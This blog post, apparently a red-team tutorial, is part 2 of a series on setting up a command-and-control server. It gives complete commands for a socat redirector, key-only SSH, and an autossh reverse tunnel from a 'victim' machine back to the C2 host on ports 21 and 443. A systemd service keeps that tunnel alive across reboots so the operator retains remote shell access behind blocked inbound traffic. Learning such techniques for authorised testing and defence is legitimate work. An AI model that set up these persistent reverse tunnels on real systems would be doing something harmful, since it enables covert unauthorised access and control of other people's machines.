Second step in setting up C2 environment. Using socat as front to autossh. Command and Control my way. @c2_matrix #autossh #ssh #pentest #pentesting #redteam #infosec

It is time for part 2 in this series to set up a Command and Control, and this time I am using ssh for creating reversed ssh tunnel to my C2-1 server. So I can run ssh from a client machine and take over this machine from my C2-1 server. A picture says more than 1000 words so lets start with that!

autossh

The steps!

  1. run socat
  2. Install ssh server on C2-1 server
  3. Configure C2-1 server for key login and no passwords
  4. Generate keys to use with autossh
  5. Install autossh
  6. Run autossh
  7. Autostart autossh
  8. Access remote machine

The socat we did in part 1 so go there if you want a little more info.

Load the socat server and map port 21 to the C2-1 server ssh server on port 22

sudo socat TCP4-LISTEN:21,fork TCP4:172.21.21.38:22

Second of we start with installation of ssh server on C2-1 server. If not that already is installed

apt-get install openssh-server

How to enable key login for ssh server

vi /etc/ssh/sshd.config and set PubkeyAuthentication to yes save the file and run

/etc/init.d/ssh restart

We have now created a ssh server on the C2-1 server with only key logins. We have also used socat server to forward any ssh connection from the public ip to our C2-1 server!

Because this is only a poc and for my own joy, I do not thick to much on security so I use the same public key for many things. Let me explain. We use keys to access the ssh server. What keys we can use is configure on the ssh server in a file ~/.ssh/authorized_keys

In that file is the public key from the client that will access the ssh server. So I create my one key a public key. That I will do with this command. (I did this on my workstation)

ssh-keygen

ssh-keygen

Then I take the information in the file in home directory ~/.ssh/id_rsa.pub and put that information in autorizedkeys on the C2-1 server.

cat ~/.ssh/id_rsa.pub

Copy what that command shows and put it in below file on the C2-1 server

vi ~/.ssh/authorized_keys

Paste it in this file

Lets try it out!

ssh with a key

We have now gone almost all the way.

We can connect from a client to C2-1 server thru socat server on port 21 with keys, no password.

What we want to do now is to do this in a more automatic way and even if the client machine reboots we want it to reconnect.

Wait, at the beginning we talked about reversed stuff not just ssh to a server.

Our client connects to the C2-1 server with ssh. But we whant to use that ssh tunnel for reconnect back to the client as the name says reversed ssh. Look at the picture at the beginning. I hope you will get my point.

Lets do this manually first with ssh.

Victim -> ssh –> C2-1 server then I that own C2-1 server ssh on local port on C2-1 server and get access to Victim.

We do this with this ssh command from Victim to C1-1 server.

ssh -4 -R 8889:localhost:22 c2-1@my-jump-server -p 21 -v

ssh for the command
-4 is for ipv 4
-R is for reversed tunnel
8880 on the C2-1 server is that port that we ca access the victim from
22 is the victim ssh ports
c2-1……is the my C2 server that I connect to ssh on port 21

From victim to c2

So the victim has now connected to my C2 server.

No it is time that I connect to the victim. And I will do this now.

I have console on my C2-1 machine and ssh to a local port that was defined above.

ssh roger@127.0.0.1 -p 8889

I have now ssh access to the victim thru the C2 server.

But what will happen if the victim reboots och kill ssh. That where autossh comes in.

This is an application that reconnect the ssh connection from the victim and C2 server.

I refer to Victim and C2 so it will get easier to understand what I am talking about.

Lets configure autossh.

Before we configured keys to use with ssh. Why? we can use password. But when we want to use autossh we must use keys and no passwords. That is why.

Lets install autossh

apt-get install autossh

Then we can try the command manually

autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/roger/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 c2-1@c2-1.name.domain -p 443

Then we move to our C2 server and connect to the victim thru port 6666

ssh roger@localhost -p 6666

But if we reboot the victim machine so now we want to create service for autossh.

vim /etc/systemd/system/autossh.service

Past below into this file. Change values to meet your requirements.

[Unit]
Description=AutoSSH service
After=network.target

[Service]
Environment="AUTOSSH_GATETIME=0"
User=roger
Group=roger
ExecStart=/usr/bin/autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/user/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no"  -R 6666:localhost:22 c2-1@c2-1.domain -p 443
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

The we change the file to be executble

chmod +x /etc/systemd/system/autossh.service

Then we enable this as a service

systemctl enable autossh.service
systemctl start autossh.service

Auto ssh picture

When do we use this? This is great to use if you have a machine where incomming communication is blocked! Then we reverse the ssh so victim open ssh tunnel out and create a reverse tunnel och the C2 server for us to access.

Keep hacking!

//Roger

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.